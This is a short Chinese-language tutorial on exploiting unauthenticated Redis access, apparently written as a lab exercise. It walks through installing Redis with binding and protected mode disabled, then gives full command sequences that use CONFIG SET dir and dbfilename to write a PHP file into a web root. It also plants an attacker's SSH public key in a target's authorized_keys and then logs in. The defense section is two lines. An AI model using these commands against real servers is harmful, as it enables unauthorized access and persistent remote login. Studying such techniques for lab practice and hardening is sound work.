Redis未授权访问
一、安装Redis
1、下载安装包
wget http://download.redis.io/releases/redis-3.2.0.tar.gz
2、解压安装包
tar xzf redis-3.2.0.tar.gz
3、安装
cd redis-3.2.0/
make //编译的意思
二、配置Redis
1、修改配置文件redis.conf
bind 127.0.0.1前面加上#号 //绑定本地访问
protected-mode设置为no //关闭保护模式
2、启动redis服务
cd src
./redis-server ../redis.conf
三、未授权连接
./redis-cli -h 192.168.88.87 //连接服务
CONFIG SET dir /var/www/html //设置路径
set x "\r\n\r\n<?php phpinfo();?>\r\n\r\n" //写入数据
CONFIG SET dbfilename phpinfo.php //创建文件
save //保存
四、防御措施
添加密码
修改配置文件redis.conf
五、未授权添加ssh密钥
1、探测目标是否存在Redis服务
2、测试Redis是否存在未授权访问
3、SSH密钥生成
ssh-keygen -t rsa
cd /root/.ssh/
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > public.txt
4、上传密钥
cat public.txt | redis-cli -h 192.168.0.101 -x set x
redis-cli -h 192.168.0.101 config set dir "/home/user/.ssh/"
redis-cli -h 192.168.0.101 config set dbfilename authorized_keys
redis-cli -h 192.168.0.101 save
5、登陆ssh
ssh -l user -p 1322 -i id_rsa 192.168.0.101